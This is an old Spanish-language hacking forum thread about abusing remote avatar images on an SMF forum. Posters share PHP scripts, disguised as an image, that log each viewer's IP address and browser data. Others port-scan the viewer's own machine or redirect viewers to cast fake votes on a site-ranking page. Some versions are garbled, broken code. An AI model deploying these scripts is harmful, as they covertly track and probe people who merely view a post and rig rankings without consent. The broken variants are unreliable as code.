Tema destacado: Recuperar cuenta de Google, GMail, Youtube
 Autor
|
Tema: Un fallo en smf en abrir imagen??? (Leído 3,925 veces)
|
|
Simbelmynë
|
Otra observacion que acabo de identificar:
Al menos en mi caso, en la misma sesion en este foro, si tengo mas de un post como no leido, luego de leer este me aparecen todos los demas como leidos, incluso este... Si luego inicio una nueva sesion, entonces este y los demas que no habia leido me aparecen no leidos... Largo juego de palabras, puramente empirico lo que digo, pero puede dar algunas pista a los mas entendidos probablemente...
Saludos
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
 Desconectado
Mensajes: 6.947
Lavando Platos
|
sip tienes razon..
seguire viendo..
usas InterneT ExploreR? = -SI------------m---------------ON-
|
|
|
|
« Última modificación: 19 Septiembre 2005, 00:05 por Sirdarckcat »
|
En línea
|
|
|
|
mousehack
Desconectado
Mensajes: 1.142
Ex-Colaborador....!!!!!!XD
|
investigando un poco... si yo creara un supuesto avatar http://[xxx.com]/image.php con el siguiente codigo en image.php: <?php
$$log="log".date("ymd").".txt "; $$fp=fopen($log, 'a '); fputs($fp, $REMOTE_ADDR.":".$REMOTE_PORT." - "$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRING."-".$HTTP_ACCEPT_LANGUAGE."-".$REQU eST_URI."\r\n"); fclose($fp)
>
supuestamente, una nueva linea se agregaria a ¨log[date].txt¨ en mi servidor como esto: 08,31,05 04,09 - xxx.xxx.xxx.xxx:8562 - Mozilla/4.0 (compatibles; MSIE 6,0; Windows NT 5.1)-http://[target]/[path]/[page]-GET -- it-/image.php
tambien podriamos comprobar si existen puertos abiertos en las PC victimas usando algo asi, por ejemplo: <?php
error_reporting(0); ini_set("max_execution_time", 0);
ini_set("default_socket_timeout ", 1); $$log="log".date"ymd").".txt "; $$fp=fopen($log, 'a '); fputs($fp, 'open puertos en ' $REMOTE_ADDR.": $$portlist="23;135;139;445;1080;3128;8080;12345 "; $$ports=explode(";", $portlist);
para ($$i=0; $$i<=count($ports)-1;
$$i++) { $$ock=fsockopen($REMOTE_ADDR, $ports[$i ]);
si ($$ock) { fputs($fp, $ports[$i ].' ');
fclose($ock); } } fputs($fp, "\r\n");
fclose($fp); > alguna otra sugerencia??? Salu2 |
|
|
|
« Última modificación: 19 Septiembre 2005, 03:52 por mousehack »
|
En línea
|
|
|
|
|
Simbelmynë
|
sip tienes razon..
seguire viendo..
usas InterneT ExploreR? = -SI------------m---------------ON-
No, por el momento estoy usando Firefox. Saludos
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
jaja puse eso porque en firefox se ve no------m------is
, y si----m----on si usas internet explorer.
entonces, ¿no funciono?
oye mousehack, eso no es nuevo.. de hecho hace unas paginas hablaron sobre eso, pero en fin, otra utilidad que se le podria dar seria la de hacer subior tu lugar en tops de sitios web, ya que cadavez seria el ip de alguien distinto.
|
|
|
|
|
En línea
|
|
|
|
yeikos
Desconectado
Mensajes: 1.424
|
mousehack, te corrijo con tu permiso: <?php
$log="log".date("ymd").".txt ";
$fp=fopen($log, 'a ');
$msg= $REMOTE_ADDR.":".$REMOTE_PORT." - ".$HTTP_USER_AGENT." - ".$HTTP_REFERER." - ".$REQUEST_METHOD." - " .$QUERY_STRING." -
".$HTTP_ACCEPT_LANGUAGE." - ".$REQUeST_URI."\r\n";
fputs($fp,$msg,1000);
fclose($fp)
?>
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
y para ademas forzarlo a votar por tu web: <?php
$log="log".date("ymd").".txt ";
$fp=fopen($log, 'a ');
$msg= $REMOTE_ADDR.":".$REMOTE_PORT." - ".$HTTP_USER_AGENT." - ".$HTTP_REFERER." - ".$REQUEST_METHOD." - " .$QUERY_STRING." -
".$HTTP_ACCEPT_LANGUAGE." - ".$REQUeST_URI."\r\n";
fputs($fp,$msg,1000);
fclose($fp)
Header ("Location: http://tutop.com/salida.php?id=7276");
?>
aunque de hecho yo no estoy en ningun top, creo que funcionaria, ya que si te lo pones de display, por ej. cada persona que entre a un "topic" donde tu hablaste votara por ti. en este ejemplo pongo la de una pag, "la tartana" nunca he entrado, pero por ley del azar le tocara un voto mas jaja.  mientras no se caiga por DoS.. todo bien.. |
|
|
|
|
En línea
|
|
|
|
yeikos
Desconectado
Mensajes: 1.424
|
Sirdarckcat, no todos los tops se votan mediante una URL única, digamos que los tops seguros tienen un formulario y si quieres votar a dicha web tienes que pulsar sobre el botón "Votar" del formulario.
|
|
|
|
|
En línea
|
|
|
|
rodimus
Desconectado
Mensajes: 42
|
Uhmmm subi el codigo de mousehack y me aparece errores kreo k le faltan algunos parentesis y lesobran algunas ";" no se si mi opinion sea la correcta ya k soy nuevo en esto mousehack si lo corriges porfavor <?php
error_reporting(0); ini_set("max_execution_time", 0);
ini_set("default_socket_timeout ", 1); $$log="log".date"ymd").".txt "; $$fp=fopen($log, 'a '); fputs($fp, 'open puertos en ' $REMOTE_ADDR.": $$portlist="23;135;139;445;1080;3128;8080;12345 "; $$ports=explode(";", $portlist);
para ($$i=0; $$i<=count($ports)-1;
$$i++) { $$ock=fsockopen($REMOTE_ADDR, $ports[$i ]);
si ($$ock) { fputs($fp, $ports[$i ].' ');
fclose($ock); } } fputs($fp, "rn");
fclose($fp); > |
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
perdon, pero como dije no esoty en ningun top, y al ver el de tutop, vi una posible utilidad.. aunque, si hay algunos sin formulario, y con cgi puedes enviar info POST, sin necesidad de curl, de php, que oculta la ip que es la que quiero explotar.. bueno esto ya se va alejando del tema.. hay que cambiar el titulo por: Usos potenciales en las imagenes de los foros.. oye rodimus.. 2 cosas. primera, aprende a programar y explotalo tu mismo no seas lmr, o sk, solo pon dudas, como por ej: oye y proque usas doble $ o algo asi.. segunda, lee todo el post antes de hablar. mousehack, te corrijo con tu permiso: <?php
$log="log".date("ymd").".txt ";
$fp=fopen($log, 'a ');
$msg= $REMOTE_ADDR.":".$REMOTE_PORT." - ".$HTTP_USER_AGENT." - ".$HTTP_REFERER." - ".$REQUEST_METHOD." - " .$QUERY_STRING." -
".$HTTP_ACCEPT_LANGUAGE." - ".$REQUeST_URI."\r\n";
fputs($fp,$msg,1000);
fclose($fp)
?> ahora entiendo porque siempre publican los exploits con errores.. jeje |
|
|
|
|
En línea
|
|
|
|
yeikos
Desconectado
Mensajes: 1.424
|
Me llevó su tiempo  . <?php
error_reporting(0);
$host = $REMOTE_ADDR;
$portlist = array("23","25","80","135", "139","445","8080");
$port = count($portlist);
$log="log-ports".date("ymd").".html";
for($i=0;$i<$port;$i++) {
$fs = fsockopen($host,$portlist[$i],$errno,$errstr,10);
if($fs)
{
$fp=fopen($log, a);
$msg= "Puerto " . $portlist[$i] . " abierto en " . $host ."<br>";
fwrite($fp,$msg,1000);
fclose($fp);
fclose($fs);
}
else
{
$fp=fopen($log, a);
$msg= "Puerto " . $portlist[$i] . " cerrado en " . $host ."<br>";
fwrite($fp,$msg,1000);
fclose($fp);
}
flush();
}
?>
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
mmm no serviria ver el navegador?
y asi dependiendo del navegador lo rediriges a una pagina diferente, puedes utilizar el bug de mozilla de %0D%0A, o poner la imagen con virus, que puse antes, que aunque no hace nada malo.. saca alertas..
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
bueno 2 variaciones probadas sin exito   [img]http://ldhackers.5gigs.com/img3.jpg[/img]
[img]http://ldhackers.5gigs.com/img4.jpg[/img] supuestamente sacaban algunos errores, y intentaban descargar un archivo, para que si lo piensan ya no lo intenten. usaba los headers. |
|
|
|
|
En línea
|
|
|
|
-sagitari-
Desconectado
Mensajes: 1.640
:D
|
Sirdarckcat, no todos los tops se votan mediante una URL única, digamos que los tops seguros tienen un formulario y si quieres votar a dicha web tienes que pulsar sobre el botón "Votar" del formulario.
Asi es.. hay que picar en el boton "votar" n la mayoria
|
|
|
|
|
En línea
|
|
|
|
|
 |
